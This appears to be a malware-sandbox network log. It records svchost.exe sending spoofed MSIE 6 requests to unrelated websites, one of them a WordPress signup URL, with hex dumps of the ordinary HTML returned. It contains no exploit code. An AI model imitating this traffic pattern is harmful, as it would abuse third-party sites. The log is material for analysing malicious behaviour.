                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2451INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                        Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2467INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2483INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                        Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        166192.168.2.66510991.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2401OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2488INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:57:07 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2488INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2504INData Raw: 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 0d 0a 32 30 30 30 0d 0a 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c
                                                                                                                                                                                                                                                                        Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... content --2000><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ... aktual
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2552INData Raw: 74 3a 31 37 39 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 0d 0a 31 30 30 30 0d 0a 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22
                                                                                                                                                                                                                                                                        Data Ascii: t:179px;margin-bottom:10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?1000v=1657112618" alt="Zosta jednym z nas - PRACA W POLICJI" /></a></div><div class="item"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2568INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 20 20 20 20 20 20 3c 21 2d 2d 20 66 6f 6f 74 65 72 20 2e 2d 2d 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2d 2d 3e 0d 0a 20 20 09 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 2d 74 6f 2d 74 6f 70 22 3e 3c 61 20 68 72 65 66 3d 22 23 70 61 67 65 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 0d 0a 61 34 0d 0a 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 50 6f 77 72 c3 b3 74 20 6e 61 20 67 c3 b3 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d
                                                                                                                                                                                                                                                                        Data Ascii: div> </div> </footer> ... footer .--> </div> ... GoToTop --> <div id="back-to-top"><a href="#page"><span></span><span a4class="sr-only">Powrt na gr strony</span></a></div> ... GoToTop .-


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        167192.168.2.665221138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2467OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2486INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:30 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2486INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        168192.168.2.6652555.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2488OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2504INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:30 GMT
                                                                                                                                                                                                                                                                        Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Length: 51841
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2520INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2536INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                        Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2569INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2585INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                        Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        169192.168.2.66528283.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:30 UTC2504OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2703INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                        Keep-Alive: timeout=2, max=95
                                                                                                                                                                                                                                                                        Content-Length: 48940
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                        X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:31 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2704INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2707INData Raw: 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63
                                                                                                                                                                                                                                                                        Data Ascii: eadyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).conc
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2715INData Raw: 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65
                                                                                                                                                                                                                                                                        Data Ascii: 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repe
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2723INData Raw: 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61
